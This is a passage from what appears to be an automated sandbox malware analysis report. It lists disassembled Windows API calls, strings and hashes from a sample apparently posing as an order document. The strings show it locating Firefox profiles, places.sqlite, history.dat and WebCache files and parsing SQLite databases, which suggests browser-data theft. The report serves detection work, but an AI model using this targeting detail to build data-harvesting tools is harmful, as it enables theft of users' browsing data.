                                        • memset.MSVCRT ref: 004040FC
                                          • Part of subcall function 004099C6: wcslen.MSVCRT ref: 004099CD
                                          • Part of subcall function 004099C6: memcpy.MSVCRT(?,?,000000FF,?,004447C5,00000000,?,?,?,00000000,?), ref: 004099E3
                                        Strings
                                        Similarity
                                        • API ID: memset$wcscpy$wcslen$CloseFolderPathSpecial_snwprintfmemcpywcscat
                                        • String ID: Mozilla\Firefox$Mozilla\Firefox\Profiles
                                        • API String ID: 4039892925-3369679110
                                        APIs
                                        • memcpy.MSVCRT(00000048,00451D40,0000002C,000003FF,00445FAE,?,00000000,?,0040B879), ref: 004444E3
                                        Strings
                                        Similarity
                                        • API ID: memcpy
                                        • String ID: BINARY$NOCASE$RTRIM$main$no such vfs: %s$temp
                                        • API String ID: 3510742995-2641926074
                                        APIs
                                          • Part of subcall function 0040B633: free.MSVCRT ref: 0040B63A
                                          • Part of subcall function 0044553B: memset.MSVCRT ref: 004455C2
                                          • Part of subcall function 0044553B: wcsrchr.MSVCRT ref: 004455DA
                                        • memset.MSVCRT ref: 004033B7
                                        • memcpy.MSVCRT(?,00000000,0000121C), ref: 004033D0
                                        • wcscmp.MSVCRT ref: 004033FC
                                        • _wcsicmp.MSVCRT ref: 00403439
                                        Strings
                                        Similarity
                                        • API ID: memset$_wcsicmpfreememcpywcscmpwcsrchr
                                        • String ID: $0.@
                                        • API String ID: 2758756878-1896041820
                                        APIs
                                          • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                          • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(C:\Windows\system32,00000104), ref: 0040A841
                                          • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                          • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                          • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000), ref: 0040A87B
                                          • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?), ref: 0040A884
                                        • GetProcAddress.KERNEL32(00000000,00000000), ref: 004449E7
                                        • GetProcAddress.KERNEL32(00000000,00000000), ref: 004449F8
                                        • GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A09
                                        • GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A1A
                                        • GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A2B
                                        • GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A3C
                                        • GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A4D
                                        Similarity
                                        • API ID: AddressProc$LibraryLoad$DirectorySystemmemsetwcscatwcscpy
                                        • String ID:
                                        • API String ID: 2941347001-0
                                        APIs
                                        • memset.MSVCRT ref: 00403C09
                                        • memset.MSVCRT ref: 00403C1E
                                          • Part of subcall function 00414C2E: SHGetSpecialFolderPathW.SHELL32(00000000,?,0000001A,00000000,?,00000000), ref: 00414C68
                                          • Part of subcall function 00409719: wcslen.MSVCRT ref: 0040971A
                                          • Part of subcall function 00409719: wcscat.MSVCRT ref: 00409732
                                        • wcscat.MSVCRT ref: 00403C47
                                          • Part of subcall function 00414C2E: memset.MSVCRT ref: 00414C87
                                          • Part of subcall function 00414C2E: RegCloseKey.ADVAPI32(00445DDE,?,?,?,?,?,00000000), ref: 00414CEE
                                          • Part of subcall function 00414C2E: wcscpy.MSVCRT ref: 00414CFC
                                        • wcscat.MSVCRT ref: 00403C70
                                        Strings
                                        Similarity
                                        • API ID: memsetwcscat$CloseFolderPathSpecialwcscpywcslen
                                        • String ID: Mozilla\Firefox\Profiles$Mozilla\Profiles
                                        • API String ID: 1534475566-1174173950
                                        APIs
                                          • Part of subcall function 00414B81: GetProcAddress.KERNEL32(00000000,SHGetSpecialFolderPathW), ref: 00414BA4
                                        • SHGetSpecialFolderPathW.SHELL32(00000000,?,0000001A,00000000,?,00000000), ref: 00414C68
                                        • memset.MSVCRT ref: 00414C87
                                        • RegCloseKey.ADVAPI32(00445DDE,?,?,?,?,?,00000000), ref: 00414CEE
                                        • wcscpy.MSVCRT ref: 00414CFC
                                          • Part of subcall function 00409CEA: GetVersionExW.KERNEL32(0045D340,0000001A,00414C4F,?,00000000), ref: 00409D04
                                        Strings
                                        • Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders, xrefs: 00414CA2, 00414CB2
                                        Similarity
                                        • API ID: AddressCloseFolderPathProcSpecialVersionmemsetwcscpy
                                        • String ID: Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
                                        • API String ID: 71295984-2036018995
                                        APIs
                                        • wcschr.MSVCRT ref: 00414458
                                        • _snwprintf.MSVCRT ref: 0041447D
                                        • WritePrivateProfileStringW.KERNEL32(?,?,?,?), ref: 0041449B
                                        • GetPrivateProfileStringW.KERNEL32(?,?,?,?,?,?), ref: 004144B3
                                        Strings
                                        Similarity
                                        • API ID: PrivateProfileString$Write_snwprintfwcschr
                                        • String ID: "%s"
                                        • API String ID: 1343145685-3297466227
                                        APIs
                                        • GetModuleHandleW.KERNEL32(kernel32.dll,?,00413EA2,?,?,?,?,?,00000000,?), ref: 00413CB5
                                        • GetProcAddress.KERNEL32(00000000,GetProcessTimes), ref: 00413CCF
                                        • GetProcessTimes.KERNELBASE(00000000,?,?,?,?,?,00413EA2,?,?,?,?,?,00000000,?), ref: 00413CF2
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.1771786076.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000005.00000002.1771786076.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                        • Associated: 00000005.00000002.1771786076.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                        • Associated: 00000005.00000002.1771786076.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_400000_orders_PI 008-01.jbxd
                                        Similarity
                                        • API ID: AddressHandleModuleProcProcessTimes
                                        • String ID: GetProcessTimes$kernel32.dll
                                        • API String ID: 1714573020-3385500049
                                        • Opcode ID: 3d2a63fc8b7889f90c1cc675bbb66959c3424aca663c91e440c9d47c6094dacc
                                        • Instruction ID: 0a9fc9a7fb2a98cd878f934f387e3824ef844cc6c25aa3dbb33b58617c33e237
                                        • Opcode Fuzzy Hash: 3d2a63fc8b7889f90c1cc675bbb66959c3424aca663c91e440c9d47c6094dacc
                                        • Instruction Fuzzy Hash: F5F03036204309AFEF008FA6FD06B963BA8BB04742F044066FA0CD1561D7B5D6B0EF99
                                        APIs
                                        • memset.MSVCRT ref: 004087D6
                                          • Part of subcall function 0040A6E6: WideCharToMultiByte.KERNEL32(0000FDE9,00000000,000003FF,000000FF,00000000,000003FF,00000000,00000000,0040B866,00445FAE,?,?,?,?,?,?), ref: 0040A6FF
                                          • Part of subcall function 004095D9: memset.MSVCRT ref: 004095FC
                                        • memset.MSVCRT ref: 00408828
                                        • memset.MSVCRT ref: 00408840
                                        • memset.MSVCRT ref: 00408858
                                        • memset.MSVCRT ref: 00408870
                                        • memset.MSVCRT ref: 00408888
                                          • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                          • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                          • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                          • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                          • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,0040DAEA,?,0040DBA1,00000000,?,00000000,00000208,?), ref: 00409B9C
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.1771786076.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000005.00000002.1771786076.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                        • Associated: 00000005.00000002.1771786076.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                        • Associated: 00000005.00000002.1771786076.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_400000_orders_PI 008-01.jbxd
                                        Similarity
                                        • API ID: memset$wcslen$AttributesByteCharFileMultiWidewcscatwcscpy
                                        • String ID:
                                        • API String ID: 2911713577-0
                                        • Opcode ID: 6684bba834465d20886231ffe2d62564197a18c1a2325da43f028315e65dbcab
                                        • Instruction ID: a7e5ca25de4111a2a05fe91eb9e7b9268c7acadad77a1a504b595fc773a76dc1
                                        • Opcode Fuzzy Hash: 6684bba834465d20886231ffe2d62564197a18c1a2325da43f028315e65dbcab
                                        • Instruction Fuzzy Hash: BD5146B280011D7EEB50E751DC46EEF776CDF05318F0040BEB948B6182EA745F948BA9
                                        APIs
                                        • memcmp.MSVCRT(?,?,00000004,?,00000065,004381DF,00000065,00000000,00000007,?,00000000), ref: 0041F202
                                        • memcmp.MSVCRT(?,SQLite format 3,00000010,?,00000065,004381DF,00000065,00000000), ref: 0041F22D
                                        • memcmp.MSVCRT(?,@ ,00000003,?,?,00000065,004381DF,00000065,00000000), ref: 0041F299
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.1771786076.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000005.00000002.1771786076.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                        • Associated: 00000005.00000002.1771786076.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                        • Associated: 00000005.00000002.1771786076.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_400000_orders_PI 008-01.jbxd
                                        Similarity
                                        • API ID: memcmp
                                        • String ID: @ $SQLite format 3
                                        • API String ID: 1475443563-3708268960
                                        • Opcode ID: bc797f5c287fbec082bfe36368e8bdb92b626008a1b8340b8f00afaa449410d4
                                        • Instruction ID: a5e199d7c3355b23248e204991ed7883f9cb1cefd3641e4a8180bf992d12f390
                                        • Opcode Fuzzy Hash: bc797f5c287fbec082bfe36368e8bdb92b626008a1b8340b8f00afaa449410d4
                                        • Instruction Fuzzy Hash: 9051C1719002199BDF10DFA9C4817DEB7F4AF44314F1541AAEC14EB246E778EA8ACB88
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.1771786076.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000005.00000002.1771786076.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                        • Associated: 00000005.00000002.1771786076.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                        • Associated: 00000005.00000002.1771786076.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_400000_orders_PI 008-01.jbxd
                                        Similarity
                                        • API ID: _wcsicmpqsort
                                        • String ID: /nosort$/sort
                                        • API String ID: 1579243037-1578091866
                                        • Opcode ID: a0f12cb90dd745c164ef67684cb79943b88980d13b6e843c418957b63f9314a7
                                        • Instruction ID: 59a4a6edbc2c6816dd96362f3638b70d105e8990563e463c72bda517b6347aa4
                                        • Opcode Fuzzy Hash: a0f12cb90dd745c164ef67684cb79943b88980d13b6e843c418957b63f9314a7
                                        • Instruction Fuzzy Hash: C8213770700201AFD714FB36C880E96F3AAFF58314F11012EE61897692DB39BC918B4A
                                        APIs
                                        • memset.MSVCRT ref: 0040E60F
                                        • memset.MSVCRT ref: 0040E629
                                          • Part of subcall function 00414C2E: SHGetSpecialFolderPathW.SHELL32(00000000,?,0000001A,00000000,?,00000000), ref: 00414C68
                                          • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                          • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                          • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                          • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                          • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,0040DAEA,?,0040DBA1,00000000,?,00000000,00000208,?), ref: 00409B9C
                                        Strings
                                        • Microsoft\Windows\WebCache\WebCacheV01.dat, xrefs: 0040E647
                                        • Microsoft\Windows\WebCache\WebCacheV24.dat, xrefs: 0040E66F
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.1771786076.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000005.00000002.1771786076.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                        • Associated: 00000005.00000002.1771786076.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                        • Associated: 00000005.00000002.1771786076.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_400000_orders_PI 008-01.jbxd
                                        Similarity
                                        • API ID: memsetwcslen$AttributesFileFolderPathSpecialwcscatwcscpy
                                        • String ID: Microsoft\Windows\WebCache\WebCacheV01.dat$Microsoft\Windows\WebCache\WebCacheV24.dat
                                        • API String ID: 2887208581-2114579845
                                        • Opcode ID: 45b77cc57d7adabb6b76daf53bfb3be083a41c4971f5e6ab387fbe8a56a2d209
                                        • Instruction ID: 2f29c334d396001d9fe1cebc89c879271eb53039ccc8e03d5a3365d75131e7c5
                                        • Opcode Fuzzy Hash: 45b77cc57d7adabb6b76daf53bfb3be083a41c4971f5e6ab387fbe8a56a2d209
                                        • Instruction Fuzzy Hash: 66118AB3D4012C66EB10E755EC85FDB73ACAF14319F1408B7B904F11C2E6B89F984998
                                        APIs
                                        • FindResourceW.KERNELBASE(?,?,?), ref: 004148C3
                                        • SizeofResource.KERNEL32(?,00000000), ref: 004148D4
                                        • LoadResource.KERNEL32(?,00000000), ref: 004148E4
                                        • LockResource.KERNEL32(00000000), ref: 004148EF
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.1771786076.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000005.00000002.1771786076.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                        • Associated: 00000005.00000002.1771786076.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                        • Associated: 00000005.00000002.1771786076.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_400000_orders_PI 008-01.jbxd
                                        Similarity
                                        • API ID: Resource$FindLoadLockSizeof
                                        • String ID:
                                        • API String ID: 3473537107-0
                                        • Opcode ID: 6eac18842e5c85fe8f5858b83388748d76eef83a8f56414f10f835c55d74c1c4
                                        • Instruction ID: 8a72e2f5d7590eb6bb033c3ed88c96ec9d5eb8bcd973c23d1c6560583cb0a60d
                                        • Opcode Fuzzy Hash: 6eac18842e5c85fe8f5858b83388748d76eef83a8f56414f10f835c55d74c1c4
                                        • Instruction Fuzzy Hash: 0101D2727402156B8B294FB6DD4999BBFAEFFC6391308803AF809D6331DA31C851C688
                                        APIs
                                        • ??3@YAXPAX@Z.MSVCRT(02160048), ref: 0044DF01
                                        • ??3@YAXPAX@Z.MSVCRT(02170050), ref: 0044DF11
                                        • ??3@YAXPAX@Z.MSVCRT(00B46D38), ref: 0044DF21
                                        • ??3@YAXPAX@Z.MSVCRT(02170458), ref: 0044DF31
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.1771786076.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000005.00000002.1771786076.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                        • Associated: 00000005.00000002.1771786076.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                        • Associated: 00000005.00000002.1771786076.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_400000_orders_PI 008-01.jbxd
                                        Similarity
                                        • API ID: ??3@
                                        • String ID:
                                        • API String ID: 613200358-0
                                        • Opcode ID: 51118905c2728d810469e0c59db0571482045495d4d228400e43909190034b47
                                        • Instruction ID: aa45652f999bbb0892b85dcd7393972dd4dfe4e89c7b59a5f1a68188070d07e1
                                        • Opcode Fuzzy Hash: 51118905c2728d810469e0c59db0571482045495d4d228400e43909190034b47
                                        • Instruction Fuzzy Hash: 5EE08C60F0830052BA31EBBABD40E2723EC5E1AB4271A842FB905C3282CE2CC880C02D
                                        APIs
                                        Strings
                                        • only a single result allowed for a SELECT that is part of an expression, xrefs: 0043AAD3
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.1771786076.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000005.00000002.1771786076.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                        • Associated: 00000005.00000002.1771786076.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                        • Associated: 00000005.00000002.1771786076.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_400000_orders_PI 008-01.jbxd
                                        Similarity
                                        • API ID: memset
                                        • String ID: only a single result allowed for a SELECT that is part of an expression
                                        • API String ID: 2221118986-1725073988
                                        • Opcode ID: d115b1de85cb0c2c74241db9f2e26d4ca9f76d3b3ab36ed3aa85b1754c3cbe0d
                                        • Instruction ID: 0c5fbdb45af1b87466ede92b40025f4dfba1e1eb7e0419b48c64bc8603b8f36f
                                        • Opcode Fuzzy Hash: d115b1de85cb0c2c74241db9f2e26d4ca9f76d3b3ab36ed3aa85b1754c3cbe0d
                                        • Instruction Fuzzy Hash: 5D827A71608340AFD720DF15C881B1BBBE1FF88318F14491EFA9987262D779E954CB96
                                        APIs
                                        • ??3@YAXPAX@Z.MSVCRT(?,00000000,00412966,/deleteregkey,/savelangfile,?,?,?,?,00000002,?,0044688C,00000000,?,0000000A), ref: 004125C3
                                        • DeleteObject.GDI32(00000000), ref: 004125E7
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.1771786076.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000005.00000002.1771786076.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                        • Associated: 00000005.00000002.1771786076.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                        • Associated: 00000005.00000002.1771786076.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_400000_orders_PI 008-01.jbxd
                                        Similarity
                                        • API ID: ??3@DeleteObject
                                        • String ID: r!A
                                        • API String ID: 1103273653-628097481
                                        • Opcode ID: 35011d0761a793af9b86058f165b74ada9e8dfd6de6a99c5cda2ffee1e56a26e
                                        • Instruction ID: d381ae2e1f6c469d4091c7bd434485f036f098756071eb86a226830a39d2e28c
                                        • Opcode Fuzzy Hash: 35011d0761a793af9b86058f165b74ada9e8dfd6de6a99c5cda2ffee1e56a26e
                                        • Instruction Fuzzy Hash: 72E04F75000302DFD7115F26E400782B7F5FF85315F11455EE89497151EBB96164CE19
                                        APIs
                                        • ??2@YAPAXI@Z.MSVCRT(00000000,0040D142,0040EBBF,?,004126A8,00000000,00000000,?), ref: 0040D0CC
                                        • ??2@YAPAXI@Z.MSVCRT(00000000,00000000,0040D142,0040EBBF,?,004126A8,00000000,00000000,?), ref: 0040D0EA
                                        • ??2@YAPAXI@Z.MSVCRT(00000000,00000000,00000000,0040D142,0040EBBF,?,004126A8,00000000,00000000,?), ref: 0040D108
                                        • ??2@YAPAXI@Z.MSVCRT(00000000,00000000,00000000,00000000,0040D142,0040EBBF,?,004126A8,00000000,00000000,?), ref: 0040D126
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.1771786076.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000005.00000002.1771786076.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                        • Associated: 00000005.00000002.1771786076.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                        • Associated: 00000005.00000002.1771786076.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_400000_orders_PI 008-01.jbxd
                                        Similarity
                                        • API ID: ??2@
                                        • String ID:
                                        • API String ID: 1033339047-0
                                        • Opcode ID: bb5a2cedd882201272bd117211a6380788fbbee7b2a1ea69d9384cb42441e8af
                                        • Instruction ID: 5f4fc1bc6a90e200713bb7744dd8ab6a017b0cf4e98027731d5581fdeff4b0c3
                                        • Opcode Fuzzy Hash: bb5a2cedd882201272bd117211a6380788fbbee7b2a1ea69d9384cb42441e8af
                                        • Instruction Fuzzy Hash: B00121B2A413005EEB7ADF38EE5772966A0AF4C351F01453EA246CD1F6EEF58480CB49
                                        APIs
                                          • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 004449E7
                                          • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 004449F8
                                          • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A09
                                          • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A1A
                                          • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A2B
                                          • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A3C
                                          • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A4D
                                        • memcmp.MSVCRT(?,0044EC68,00000010,?,00000000,?), ref: 00444BA5
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.1771786076.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000005.00000002.1771786076.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                        • Associated: 00000005.00000002.1771786076.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                        • Associated: 00000005.00000002.1771786076.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_400000_orders_PI 008-01.jbxd
                                        Similarity
                                        • API ID: AddressProc$memcmp
                                        • String ID: $$8
                                        • API String ID: 2808797137-435121686
                                        • Opcode ID: e80885fdbb6a557c0c44277052daa68a3f3074bd67b4db13da85d3ecc8de475b
                                        • Instruction ID: 2c4e4273d6b09173b98ec99ba1a72f96ebc6587eba5c15334d9e54441f883a66
                                        • Opcode Fuzzy Hash: e80885fdbb6a557c0c44277052daa68a3f3074bd67b4db13da85d3ecc8de475b
                                        • Instruction Fuzzy Hash: 04314171A00209ABEB10DFA6CDC1BAEB7B9FF88314F11055AE515A3241D778ED048B69
                                        APIs
                                          • Part of subcall function 0040E01E: OpenProcess.KERNEL32(00000040,00000000,00000000,00000104,?,00000000,00000104,?,00000000,00000104,00000000), ref: 0040E093
                                          • Part of subcall function 0040E01E: GetCurrentProcess.KERNEL32(?,80000000,00000000,00000000), ref: 0040E0B2
                                          • Part of subcall function 0040E01E: DuplicateHandle.KERNELBASE(?,00000104,00000000), ref: 0040E0BF
                                          • Part of subcall function 0040E01E: GetFileSize.KERNEL32(?,00000000), ref: 0040E0D4
                                          • Part of subcall function 0040E01E: CreateFileMappingW.KERNELBASE(?,00000000,00000002,00000000,00000000,00000000), ref: 0040E0FE
                                          • Part of subcall function 0040E01E: MapViewOfFile.KERNELBASE(00000000,00000004,00000000,00000000,00000104), ref: 0040E113
                                          • Part of subcall function 0040E01E: WriteFile.KERNELBASE(00000000,00000000,00000104,0040E6A3,00000000), ref: 0040E12E
                                          • Part of subcall function 0040E01E: UnmapViewOfFile.KERNEL32(00000000), ref: 0040E135
                                          • Part of subcall function 0040E01E: CloseHandle.KERNELBASE(?), ref: 0040E13E
                                        • CloseHandle.KERNELBASE(000000FF,000000FF,00000000,?,0040E6A3,000000FF,?,00000104,00000000), ref: 0040E582
                                          • Part of subcall function 0040E2AB: memset.MSVCRT ref: 0040E380
                                          • Part of subcall function 0040E2AB: wcschr.MSVCRT ref: 0040E3B8
                                          • Part of subcall function 0040E2AB: memcpy.MSVCRT(?,-00000121,00000008,Function_0004E518,00000000,00000000,75572EE0), ref: 0040E3EC
                                        • DeleteFileW.KERNELBASE(?,?,0040E6A3,000000FF,?,00000104,00000000), ref: 0040E5A3
                                        • CloseHandle.KERNEL32(000000FF,?,0040E6A3,000000FF,?,00000104,00000000), ref: 0040E5CA
                                          • Part of subcall function 0040E175: memset.MSVCRT ref: 0040E1BD
                                          • Part of subcall function 0040E175: _snwprintf.MSVCRT ref: 0040E257
                                          • Part of subcall function 0040E175: free.MSVCRT ref: 0040E28B
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.1771786076.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000005.00000002.1771786076.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                        • Associated: 00000005.00000002.1771786076.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                        • Associated: 00000005.00000002.1771786076.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_400000_orders_PI 008-01.jbxd
                                        Similarity
                                        • API ID: File$Handle$Close$ProcessViewmemset$CreateCurrentDeleteDuplicateMappingOpenSizeUnmapWrite_snwprintffreememcpywcschr
                                        • String ID:
                                        • API String ID: 1979745280-0
                                        • Opcode ID: db5b060151050967cb8a3560fbfd23956168ef1b290a982d56d7add8c3b4651d
                                        • Instruction ID: 90d235a97b45fa8760f9e747b2c38a4e83ddeae1161d8ec943a7631d31c9d9e7
                                        • Opcode Fuzzy Hash: db5b060151050967cb8a3560fbfd23956168ef1b290a982d56d7add8c3b4651d
                                        • Instruction Fuzzy Hash: DA312CB1C00618ABCF60DF96CD456CEF7B8AF44318F1006AB9518B31A1DB755E95CF58
                                        APIs
                                          • Part of subcall function 00403BED: memset.MSVCRT ref: 00403C09
                                          • Part of subcall function 00403BED: memset.MSVCRT ref: 00403C1E
                                          • Part of subcall function 00403BED: wcscat.MSVCRT ref: 00403C47
                                          • Part of subcall function 00403BED: wcscat.MSVCRT ref: 00403C70
                                        • memset.MSVCRT ref: 00403A55
                                          • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                          • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                          • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                          • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                          • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,0040DAEA,?,0040DBA1,00000000,?,00000000,00000208,?), ref: 00409B9C
                                          • Part of subcall function 0040A8D0: wcslen.MSVCRT ref: 0040A8E2
                                          • Part of subcall function 0040A8D0: free.MSVCRT ref: 0040A908
                                          • Part of subcall function 0040A8D0: free.MSVCRT ref: 0040A92B
                                          • Part of subcall function 0040A8D0: memcpy.MSVCRT(?,?,000000FF,00000001,?,00000000,?,?,0040AD76,?,000000FF), ref: 0040A94F
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.1771786076.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000005.00000002.1771786076.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                        • Associated: 00000005.00000002.1771786076.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                        • Associated: 00000005.00000002.1771786076.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_400000_orders_PI 008-01.jbxd
                                        Similarity
                                        • API ID: memsetwcscatwcslen$free$AttributesFilememcpywcscpy
                                        • String ID: history.dat$places.sqlite
                                        • API String ID: 2641622041-467022611
                                        • Opcode ID: 0d9359b71a36c6a5ae09cc3eb1ef66efc5ef5f63627713107dbdf360f7abf22a
                                        • Instruction ID: 4d52d99a2018a06e8b3479be55870673e402391ac5db5fe9af26a684ed702786
                                        • Opcode Fuzzy Hash: 0d9359b71a36c6a5ae09cc3eb1ef66efc5ef5f63627713107dbdf360f7abf22a
                                        • Instruction Fuzzy Hash: CA112EB2A0111866DB10FA66CD4AACE77BCAF54354F1001B7B915B20C2EB3CAF45CA69
                                        APIs
                                          • Part of subcall function 00417570: SetFilePointer.KERNELBASE(?,?,?,00000000), ref: 00417591
                                          • Part of subcall function 00417570: GetLastError.KERNEL32 ref: 004175A2
                                          • Part of subcall function 00417570: GetLastError.KERNEL32 ref: 004175A8
                                        • ReadFile.KERNELBASE(?,?,?,?,00000000), ref: 0041761D
                                        • GetLastError.KERNEL32 ref: 00417627
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.1771786076.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                         • Associated: 00000005.00000002.1771786076.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                         • Associated: 00000005.00000002.1771786076.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                         • Associated: 00000005.00000002.1771786076.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_400000_orders_PI 008-01.jbxd
                                        Similarity
                                        • API ID: ErrorLast$File$PointerRead
                                        • String ID:
                                        • API String ID: 839530781-0
                                        • Opcode ID: 43cd8d8e6b63bda72f55cb56ee55d1ec8e5478229177a04f989a23650c495d71
                                        • Instruction ID: c9208e3d43fc8ff2949f7201360c8f82def2114e122364bdeb0a9035ecfb973e
